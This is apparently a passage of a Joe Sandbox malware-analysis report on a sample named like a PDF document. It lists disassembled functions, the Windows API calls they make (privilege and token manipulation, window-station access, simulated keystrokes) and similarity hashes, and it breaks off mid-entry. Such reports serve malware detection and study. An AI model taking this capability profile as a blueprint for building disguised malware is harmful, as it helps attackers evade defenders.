                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 3bc2f8caf1f11ce5889684a055a356d894b84363ed3f9ae715c4aa4abcdc7791
                                    • Instruction ID: 14b20252e1d20f232896b0ba7e65f44d1dd0b27d9715a5e4eaa47425ab714e3d
                                    • Opcode Fuzzy Hash: 3bc2f8caf1f11ce5889684a055a356d894b84363ed3f9ae715c4aa4abcdc7791
                                    • Instruction Fuzzy Hash: 15211574908341DFCB24DF15C844B5ABBE1BF84314F058958E98947762D735E849EF52
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FD09F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID:
                                    • API String ID: 82841172-0
                                    • Opcode ID: 40e7318c80454619ffc0c6a5072945de8cba92b3fb7d048b1cdc630dc4b0c969
                                    • Instruction ID: 59062fc8cc27c0ca99f871e0b130bfa8051665d6e8cfa837f5e4046c3b2b69fc
                                    • Opcode Fuzzy Hash: 40e7318c80454619ffc0c6a5072945de8cba92b3fb7d048b1cdc630dc4b0c969
                                    • Instruction Fuzzy Hash: 8101297284F3C18FC31287B0987A6D23FB9DE4722532841DF9C828B663E45A581BA752
                                    APIs
                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00FB5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FB5D76
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: 535fd316ad02168c47c11c068822439f2ca7132ec74becc249089e34f0300d23
                                    • Instruction ID: 11a8d46ee7fdec32a4341b5fed349bf086f3825da9124b5e05b1ca25b6e5f685
                                    • Opcode Fuzzy Hash: 535fd316ad02168c47c11c068822439f2ca7132ec74becc249089e34f0300d23
                                    • Instruction Fuzzy Hash: 6A113D31604B019FD3308F16D444BA2B7E5EF49B60F10CA1DE9AA86650D779E945DF60
                                    APIs
                                    • __lock_file.LIBCMT ref: 00FD4AD6
                                      • Part of subcall function 00FD8D68: __getptd_noexit.LIBCMT ref: 00FD8D68
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: 6ad88ea0627119d6a7e34d84d560d5d73912ba8f262262f6c3142479e8a7cb5f
                                    • Instruction ID: 021f61fe42bc3920badad39f4f844eaf8a0d46a98aad3eeaeda6b6a0042ab9d2
                                    • Opcode Fuzzy Hash: 6ad88ea0627119d6a7e34d84d560d5d73912ba8f262262f6c3142479e8a7cb5f
                                    • Instruction Fuzzy Hash: CBF0DC31900209ABDB61AF658C063AE37A3AF00365F0C8106B424AA2D1CBBC9A11FB41
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,010762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FB4FDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: f3c2e6cf948c2063a3c9c950332c8167a44cbe222437f967c5a8b2dcbcda0b2d
                                    • Instruction ID: c91251c9fa03f907d419176d73ff23bda6e5ec60836af9c9a70f64553d95cf1f
                                    • Opcode Fuzzy Hash: f3c2e6cf948c2063a3c9c950332c8167a44cbe222437f967c5a8b2dcbcda0b2d
                                    • Instruction Fuzzy Hash: 68F03071505712CFC7349F65E594962BBE5BF043293248A3EE1D683A12C771A840EF40
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FD09F4
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LongNamePath_memmove
                                    • String ID:
                                    • API String ID: 2514874351-0
                                    • Opcode ID: b128c82ed9b0423929b73f64e7275557719c4ad25c068ef9230498e32bc6175f
                                    • Instruction ID: 2df337e3804ca3c22645a5812dd2d7fa90ef14ad6dd5de4acad0ef82ac1c79a3
                                    • Opcode Fuzzy Hash: b128c82ed9b0423929b73f64e7275557719c4ad25c068ef9230498e32bc6175f
                                    • Instruction Fuzzy Hash: 55E08636D0422957C720E5599C05FFA77ADDFC8790F0401B5FC4CD7248D9659C818691
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 85a266c19ac15f6dd4f37f244161312340f338b31e1d7e5613d3c154e10e17cf
                                    • Instruction ID: f35e48b4bc3a6a4d80d421c5221a5c6b5e36bf5c8cc4877b949b2e0850341a51
                                    • Opcode Fuzzy Hash: 85a266c19ac15f6dd4f37f244161312340f338b31e1d7e5613d3c154e10e17cf
                                    • Instruction Fuzzy Hash: D3E092B1104B005FEB758A28D810BE377E1BB06319F00085DF2DA83342EB667881D759
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00FEE16B,?,?,00000000), ref: 00FB5DBF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: bb1024ba84f895e190e9d36430bb414dc77cec921702e249eae42ad354320dab
                                    • Instruction ID: 215a46644ad7f5e6c116e5ed31cc778ae101e73a9dcd8da9d6034c41c20313f7
                                    • Opcode Fuzzy Hash: bb1024ba84f895e190e9d36430bb414dc77cec921702e249eae42ad354320dab
                                    • Instruction Fuzzy Hash: 9DD0C77464020CBFE710DB80DC46FA9777CD705710F100194FD0456290D6F27D508795
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __wfsopen
                                    • String ID:
                                    • API String ID: 197181222-0
                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction ID: 96a75311a17050bfd4a51ec64539b3788114d3949f307d62acf988e11e066862
                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction Fuzzy Hash: 8CB0927684020C77DE012E82EC02A593B1A9B41A79F848021FB0C18262A677A6A0A68A
                                    APIs
                                    • GetTempPathW.KERNELBASE(00000104,?), ref: 00FF221A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: PathTemp
                                    • String ID:
                                    • API String ID: 2920410445-0
                                    • Opcode ID: 187f9f275f914df0da359d7a9dd6d1e3e61e581770e93273f9af2165aeb0afe0
                                    • Instruction ID: f5ab0e3c4ff068ef0d71d8924c9f8b840d6ae8f7ba560674591676c4cc61f45c
                                    • Opcode Fuzzy Hash: 187f9f275f914df0da359d7a9dd6d1e3e61e581770e93273f9af2165aeb0afe0
                                    • Instruction Fuzzy Hash: EEC04C7185401ADBE715A650CC95BB8722CBF00701F1400D5764595150D9B45B40DF11
                                    APIs
                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0101D46A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: 85fa37d6e49891462724e406450f9e70d8d6b47784d662fbda453132c8859933
                                    • Instruction ID: 3d06df9e90896ffb1dd4e7f84f8730d22a3eddeaca2a9639c88e100b7396e79d
                                    • Opcode Fuzzy Hash: 85fa37d6e49891462724e406450f9e70d8d6b47784d662fbda453132c8859933
                                    • Instruction Fuzzy Hash: 697174302083028FC714EF69C895BAEB7E5AF84714F04456DF5969B2A2DF38E909DF52
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: ceeae3ebae09ff9f3ae40814731f50ea458d3829ad7ca32a05f2159aadb29a8f
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: 7231B371A00106DBC718DF59D480A69FBA6FF99310F688AA6E409CB751DB31EDC1EBD0
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 00F822B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: fe8dc0fbecc800fa783ff8e03d53aaf770d8a03d78cf79d2c62a482c4a7a74e4
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: 1EE0E67494010EDFDB00EFB8D5496DE7FB4EF04301F100161FD01D2280D6309D509A72
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0103CE50
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0103CE91
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0103CED6
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0103CF00
                                    • SendMessageW.USER32 ref: 0103CF29
                                    • _wcsncpy.LIBCMT ref: 0103CFA1
                                    • GetKeyState.USER32(00000011), ref: 0103CFC2
                                    • GetKeyState.USER32(00000009), ref: 0103CFCF
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0103CFE5
                                    • GetKeyState.USER32(00000010), ref: 0103CFEF
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0103D018
                                    • SendMessageW.USER32 ref: 0103D03F
                                    • SendMessageW.USER32(?,00001030,?,0103B602), ref: 0103D145
                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0103D15B
                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0103D16E
                                    • SetCapture.USER32(?), ref: 0103D177
                                    • ClientToScreen.USER32(?,?), ref: 0103D1DC
                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0103D1E9
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0103D203
                                    • ReleaseCapture.USER32 ref: 0103D20E
                                    • GetCursorPos.USER32(?), ref: 0103D248
                                    • ScreenToClient.USER32(?,?), ref: 0103D255
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0103D2B1
                                    • SendMessageW.USER32 ref: 0103D2DF
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0103D31C
                                    • SendMessageW.USER32 ref: 0103D34B
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0103D36C
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0103D37B
                                    • GetCursorPos.USER32(?), ref: 0103D39B
                                    • ScreenToClient.USER32(?,?), ref: 0103D3A8
                                    • GetParent.USER32(?), ref: 0103D3C8
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0103D431
                                    • SendMessageW.USER32 ref: 0103D462
                                    • ClientToScreen.USER32(?,?), ref: 0103D4C0
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0103D4F0
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0103D51A
                                    • SendMessageW.USER32 ref: 0103D53D
                                    • ClientToScreen.USER32(?,?), ref: 0103D58F
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0103D5C3
                                      • Part of subcall function 00FB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FB25EC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0103D65F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 3977979337-4164748364
                                    • Opcode ID: d308c97baf3a03923226372aecf6e3d22b312d7ece1e1c973361a78a37cdc189
                                    • Instruction ID: f09367d0b53fdf6572a1e970cba0f87c9ba01e78257e2f9157983b7e24355c73
                                    • Opcode Fuzzy Hash: d308c97baf3a03923226372aecf6e3d22b312d7ece1e1c973361a78a37cdc189
                                    • Instruction Fuzzy Hash: F442BF70604241AFE725CF28C944EAABBE9FF88354F04055EF6D5E72A1C736D844DBA2
                                    APIs
                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0103873F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 3850602802-328681919
                                    • Opcode ID: a1473693b188cec6669905e274deec7da33712e6935737e610f9187017d3878b
                                    • Instruction ID: 09d57fa1391708c35b3188ee37c1a1011f91dc355e50b3e3df622ac5eb7c3f80
                                    • Opcode Fuzzy Hash: a1473693b188cec6669905e274deec7da33712e6935737e610f9187017d3878b
                                    • Instruction Fuzzy Hash: 1B12C071500204ABEB658F29CC49FAE7BFDEF89350F14829AFA95EB2D1DB758540CB10
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove$_memset
                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                    • API String ID: 1357608183-1798697756
                                    • Opcode ID: 0a8eb45bc26e91009321afd075dd3fae92c17333eacd008bd4be6e7690aa506a
                                    • Instruction ID: 03a5e08831b95959d2a2f8f0e37d35c192366f40510947e7ece2b304473426e1
                                    • Opcode Fuzzy Hash: 0a8eb45bc26e91009321afd075dd3fae92c17333eacd008bd4be6e7690aa506a
                                    • Instruction Fuzzy Hash: 94939171A00216DFEB26DF58C985BADB7F1FF48310F2581AAD985EB2C1E7709981DB40
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,?), ref: 00FB4A3D
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FEDA8E
                                    • IsIconic.USER32(?), ref: 00FEDA97
                                    • ShowWindow.USER32(?,00000009), ref: 00FEDAA4
                                    • SetForegroundWindow.USER32(?), ref: 00FEDAAE
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FEDAC4
                                    • GetCurrentThreadId.KERNEL32 ref: 00FEDACB
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEDAD7
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FEDAE8
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FEDAF0
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FEDAF8
                                    • SetForegroundWindow.USER32(?), ref: 00FEDAFB
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FEDB10
                                    • keybd_event.USER32(00000012,00000000), ref: 00FEDB1B
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FEDB25
                                    • keybd_event.USER32(00000012,00000000), ref: 00FEDB2A
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FEDB33
                                    • keybd_event.USER32(00000012,00000000), ref: 00FEDB38
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FEDB42
                                    • keybd_event.USER32(00000012,00000000), ref: 00FEDB47
                                    • SetForegroundWindow.USER32(?), ref: 00FEDB4A
                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00FEDB71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 29917c5966e4019b631b40cddfb9cb2623008ba1e6c6462427405d1001e1d7a7
                                    • Instruction ID: 77d00422b23788c4161d54b3bc2d1aa75005814dd82fe5b250a643fbbbca30d2
                                    • Opcode Fuzzy Hash: 29917c5966e4019b631b40cddfb9cb2623008ba1e6c6462427405d1001e1d7a7
                                    • Instruction Fuzzy Hash: 20315271E40319BBEB316F629C49F7F3E6CEB44B60F114025FA04EA1D1D6B55900BBA1
                                    APIs
                                      • Part of subcall function 01008CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01008D0D
                                      • Part of subcall function 01008CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01008D3A
                                      • Part of subcall function 01008CC3: GetLastError.KERNEL32 ref: 01008D47
                                    • _memset.LIBCMT ref: 0100889B
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 010088ED
                                    • CloseHandle.KERNEL32(?), ref: 010088FE
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01008915
                                    • GetProcessWindowStation.USER32 ref: 0100892E
                                    • SetProcessWindowStation.USER32(00000000), ref: 01008938
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01008952
                                      • Part of subcall function 01008713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01008851), ref: 01008728
                                      • Part of subcall function 01008713: CloseHandle.KERNEL32(?,?,01008851), ref: 0100873A
                                    Strings
                                    Memory Dump Source
